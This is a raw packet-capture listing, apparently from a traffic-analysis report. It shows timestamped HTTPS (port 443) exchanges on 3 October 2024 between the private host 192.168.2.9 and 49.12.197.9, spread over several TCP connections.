                                                                                                                                                                            Oct 3, 2024 03:26:55.465096951 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.465486050 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.465507030 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.465563059 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.465569019 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.465576887 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.465703964 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.472861052 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.472893953 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.472980976 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.472980976 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.472987890 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.473038912 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.478008032 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.478032112 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.478163004 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.478163004 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.478169918 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.478224993 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.480803967 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.480827093 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.480947971 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.480954885 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.481086969 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.493263960 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.493288994 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.493369102 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.493383884 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.493546963 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.493546963 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.522398949 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.522433996 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.522521019 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.522521019 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.522535086 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.522589922 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.556788921 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.556819916 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.556936979 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.556946993 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.557151079 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.557496071 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.557519913 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.557651043 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.557651043 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.557657957 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.557699919 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.558145046 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.558167934 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.558233023 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.558239937 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.558278084 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.566001892 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.566034079 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.566108942 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.566108942 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.566122055 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.566245079 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.570868015 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.570890903 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.570945978 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.570954084 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.571017981 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.573280096 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.573307991 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.573391914 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.573391914 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.573399067 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.573458910 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.585999966 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.586044073 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.586766958 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.586781025 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.586920023 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.615098953 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.615129948 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.615320921 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.615329981 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.615403891 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.649910927 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.649940968 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650230885 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650238991 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650352001 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650562048 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650594950 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650645018 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650661945 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650667906 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650702953 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650702953 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650702953 CEST49718443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:26:55.650713921 CEST4434971849.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.020325899 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.020353079 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.020418882 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.020432949 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.020482063 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.020503044 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.028970003 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.028990984 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.029077053 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.029092073 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.029156923 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.038736105 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.038757086 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.038850069 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.038863897 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.038921118 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.047589064 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.047611952 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.047677994 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.047691107 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.047719002 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.047739029 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.056739092 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.056759119 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.056862116 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.056876898 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.056932926 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.075097084 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.075126886 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.075220108 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.075233936 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.075293064 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.090490103 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.090512037 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.090681076 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.090698957 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.090760946 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.104146004 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.104167938 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.104254007 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.104275942 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.104336023 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.113060951 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.113085032 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.113141060 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.113153934 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.113189936 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.113210917 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.123481035 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.123502016 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.123562098 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.123574018 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.123605967 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.123626947 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.131465912 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.131488085 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.131541014 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.131552935 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.131581068 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.131604910 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.140372992 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.140393972 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.140445948 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.140459061 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.140492916 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.140515089 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.151298046 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.151319027 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.151382923 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.151396990 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.151449919 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.184515953 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.184549093 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.184703112 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.184732914 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.184792042 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.190514088 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.190536022 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.190625906 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.190639973 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.190697908 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.198357105 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.198381901 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.198507071 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.198519945 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.198579073 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.207627058 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.207649946 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.207748890 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.207763910 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.207820892 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.218028069 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.218048096 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.218120098 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.218132973 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.218168974 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.218190908 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.226085901 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.226108074 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.226197958 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.226211071 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.226272106 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.234822989 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.234846115 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.235030890 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.235044003 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.235133886 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.245872974 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.245899916 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.245996952 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.246011019 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.246077061 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.283312082 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.283329010 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.283524036 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.283591986 CEST4434972249.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.284003973 CEST49722443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202398062 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202420950 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202505112 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202591896 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202630997 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202655077 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217561960 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217586040 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217639923 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217650890 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217688084 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217709064 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229231119 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229284048 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229320049 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229329109 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229360104 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229374886 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.237860918 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.237881899 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.237982035 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.237998962 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.238092899 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247801065 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247823000 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247874022 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247885942 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247910023 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247926950 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255040884 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255064964 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255131006 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255146027 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255177021 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255188942 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263698101 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263724089 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263767004 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263776064 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263806105 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263840914 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271785021 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271809101 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271846056 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271852970 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271886110 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271895885 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.291085958 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.291107893 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.291172028 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.291182995 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.291301012 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306328058 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306364059 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306408882 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306420088 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306447029 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306474924 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.317838907 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.317869902 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.317924023 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.317939997 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.317986012 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.318007946 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326488018 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326508999 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326562881 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326570988 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326596022 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326610088 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336270094 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336292028 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336342096 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336350918 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336386919 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336404085 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.343744040 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.343764067 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.343817949 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.343828917 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.343858004 CEST49723443192.168.2.949.12.197.9
